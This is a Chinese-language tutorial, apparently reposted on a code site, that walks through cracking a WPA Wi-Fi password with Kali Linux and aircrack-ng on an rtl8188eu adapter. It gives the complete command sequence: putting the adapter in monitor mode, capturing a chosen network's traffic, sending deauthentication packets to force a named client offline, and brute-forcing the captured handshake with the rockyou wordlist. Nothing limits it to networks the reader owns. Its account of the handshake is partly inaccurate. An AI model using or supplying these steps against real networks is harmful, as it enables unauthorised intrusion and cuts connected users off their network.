使用kail做wifi滲透,網卡rtl8188eu(超詳細)


前一篇文章講了如何在虛擬機中安裝kail

1.第一步將網卡掛載到虛擬機中:

按下圖操作即可下圖所示

然后打開終端輸入:ifconfig,如下出現wlan0,表示掛載成功

 2.打開kail的無線攻擊功能:

 

 

3.查看各接口的狀態:

airmon-ng

如果你的網卡本身支持監聽功能就好。

如果像我一樣顯卡的芯片是rtl8188eu本身不支持監聽功能的,那么很可能你的PHY欄會顯示null,那么后面想監聽wifi是不可能的,解決方法只有重新編譯驅動,請參考我這篇文章

4.檢查影響aircrack-ng的進程

當我們將網卡置於monitor模式的時候,會自動地檢查影響aircrack-ng的進程。也可以通過以下命令手動檢查:

airmon-ng check

5.殺死影響aircrack-ng的進程

以下命令會停掉network managers然后殺死所有影響aircrack-ng的進程:

airmon-ng check kill

6.開啟monitor模式

airmon-ng start wlan0

我的是上面這樣,雖然名字沒有改成wlan0mon但是也可以用,可能和我的網卡有關系,本身rtl8188eu就是不支持的。

如果網卡本身支持,正常情況下是這樣,會出現wlan0mon或者mon

7.監聽周邊wifi:

airodump-ng wlan0  # 你的后面有mon就跟寫上mon

 BSSID為wifi的MAC地址,PWR為信號強弱程度,數值越小信號越強;#DATA為數據量,越大使用的人就越多,CH為信道頻率(頻道),ESSID為wifi的名稱,中文可能會有亂碼

8.對你要破解的wifi進行抓包,以第一個wifi為例子

sudo airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/answer/aaa/a1/a1 wlan0

格式:airodump-ng --bssid BSSID -c 信道頻率 -w 抓包存儲的路徑 wlan0mon

 

 

 9.通常只是第8步很難抓到包,所以需要對已連接的終端進行攻擊,使它掉線重連,以此來獲取數據包。

通過上面的圖片和一看到,有三個正在連接的終端,選一個信號最強的也就是PWR是-76的,以此為例,重新打開一個終端輸入如下:

aireplay-ng -0 2 -a BC:5F:6F:3D:03:74 -c B8:37:65:94:5D:13 wlan0

(0 WiFi設備無限次數,-0 2則攻擊2次。攻擊原理是:先讓設備掉線,設備會再自動連接,並發這個自動連接過程會進行三次握手,會發送tcp包(里面包含加密的密碼數據),我方偽裝成WiFi熱點去竊取該數據包。我方竊取后即可用字典窮舉法暴力破解加密的WiFi密碼,數據包里面的密碼是哈希加密的,哈希加密只能正向)

10.當第8步中的終端出現WPA handshake時,表示抓包成功

 

 

兩個終端都按Ctrl+c停止,不然那邊會一直斷網的

cd打開抓包的目錄,ls列出來,就看到我們抓到的數據包

11.字典解密

解壓kail中自帶的字典,在/usr/share/wordlists/

 

 

 有很多,最大的是rockyou.txt.gz,解壓后大約160m

解壓命令:

gzip -d/usr/share/wordlists/rockyou.txt.gz

# 或者

# zcat rockyou.txt.gz > r.txt # 新建一個txt文件

最后,進行字典破解cap文件:

aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap

漫長只等待,在這個過程中,就不需要網卡了,只是離線破解,所以網卡可以該干嘛干嘛就行,重啟network-manager命令是:service network-manager start 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM